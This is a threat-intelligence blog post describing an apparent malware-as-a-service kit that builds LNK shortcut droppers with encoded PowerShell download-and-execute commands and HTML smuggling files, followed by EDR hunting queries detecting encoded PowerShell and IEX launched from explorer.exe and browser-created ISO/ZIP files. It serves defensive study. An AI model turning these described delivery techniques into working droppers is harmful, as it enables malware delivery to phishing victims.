Cyberdudebivash

Malware-as-a-Service: New ‘Point-and-Click’ Kit Bypasses Security to Deliver Payloads via LNK and HTML

, , ,
CYBERDUDEBIVASH

 Threat Analysis • Malware-as-a-Service

      Malware-as-a-Service: New ‘Point-and-Click’ Kit Bypasses Security to Deliver Payloads via LNK and HTML    

By CyberDudeBivash • October 04, 2025 • Threat Intelligence Report

 cyberdudebivash.com |       cyberbivash.blogspot.com 

Share on XShare on LinkedIn

Disclosure: This is a technical threat analysis for security professionals. It contains affiliate links to relevant security solutions and training. Your support helps fund our independent research.

 Threat Report: Table of Contents 

  1. Chapter 1: The Industrialization of Hacking — The Rise of “Point-and-Click” MaaS
  2. Chapter 2: Threat Analysis Part 1 — The Automated LNK Dropper Builder
  3. Chapter 3: Threat Analysis Part 2 — The Automated HTML Smuggling Builder
  4. Chapter 4: The Defender’s Playbook — Hunting for EasySploit’s TTPs

Chapter 1: The Industrialization of Hacking — The Rise of “Point-and-Click” MaaS

The cybercrime ecosystem has undergone a dramatic professionalization. Sophisticated attack techniques are no longer the exclusive domain of elite state actors. They are now packaged, productized, and sold as a service. We are tracking a new Malware-as-a-Service (MaaS) platform, which we’re calling **”EasySploit,”** that exemplifies this trend. It provides a simple, graphical “point-and-click” web interface that allows even low-skilled criminals to generate highly evasive dropper files in seconds. This democratization of advanced TTPs is dramatically increasing the volume and sophistication of threats that security teams face every day.

Chapter 2: Threat Analysis Part 1 — The Automated LNK Dropper Builder

The first module of the EasySploit platform automates the creation of malicious LNK files, a TTP used by a wide range of malware, including the **SORVEPOTEL worm**.

The Criminal’s Workflow:

  1. The criminal subscribes to the EasySploit service.
  2. In the web UI, they simply paste the URL of their final payload (e.g., an infostealer hosted on a remote server).
  3. They click “Generate LNK.”
  4. The EasySploit backend automatically generates a PowerShell one-liner to download and execute the payload, encodes it in Base64, and embeds it into the “Target” field of a Windows Shortcut (.LNK) file.
  5. The criminal downloads the ready-to-use malicious LNK file and includes it in their phishing campaign.

Chapter 3: Threat Analysis Part 2 — The Automated HTML Smuggling Builder

The platform’s more advanced module automates **HTML Smuggling**, a powerful technique for bypassing network security gateways.

The Criminal’s Workflow:

  1. The criminal uploads their malicious payload (e.g., a ZIP or ISO file containing a RAT) to the EasySploit platform.
  2. They click “Generate HTML.”
  3. The backend service Base64-encodes the entire malicious file and embeds it inside a JavaScript “Blob” within a single HTML file.
  4. The criminal downloads this HTML file. When the victim receives and opens this “harmless” `.html` attachment, the JavaScript inside it reconstructs the malicious ISO/ZIP file from the Blob and triggers a download in the user’s browser, effectively “smuggling” it past the email gateway’s file-type filters.

Chapter 4: The Defender’s Playbook — Hunting for EasySploit’s TTPs

Because these techniques abuse legitimate system features, detection must focus on the behavioral anomalies they create. This requires a modern **Endpoint Detection and Response (EDR)** solution.

Key Hunting Queries for Your SOC:

  • To Detect the LNK Dropper:** Hunt for the parent-child relationship of the Windows shell launching PowerShell after a user clicks a shortcut.
    ParentProcess:explorer.exe AND ProcessName:powershell.exe AND (CommandLine CONTAINS "-EncodedCommand" OR CommandLine CONTAINS "IEX")
  • To Detect HTML Smuggling:** Hunt for a browser process creating an unusually large file or a suspicious file type.
    Event_Type:FileCreation AND ProcessName IN ('chrome.exe', 'msedge.exe') AND FileExtension IN ('.iso', '.zip', '.img', '.vhd')

 Behavioral Defense is Key: An EDR platform is non-negotiable for detecting these modern, evasive techniques. **Kaspersky’s EDR/XDR solutions** are built to detect these malicious behaviors and TTPs, regardless of the specific payload or how the dropper was generated.  

Get Daily Malware & Threat Intel

Subscribe for deep-dive malware analysis, threat hunting guides, and strategic insights.         Subscribe  

About the Author

CyberDudeBivash is a cybersecurity strategist with 15+ years in malware analysis, threat hunting, and reverse engineering, advising SOC teams and CISOs across APAC. [Last Updated: October 04, 2025]

  #CyberDudeBivash #MaaS #Malware #LNK #HTMLsmuggling #CyberSecurity #ThreatHunting #InfoSec #EDR #Phishing

Leave a comment

Design a site like this with WordPress.com
Get started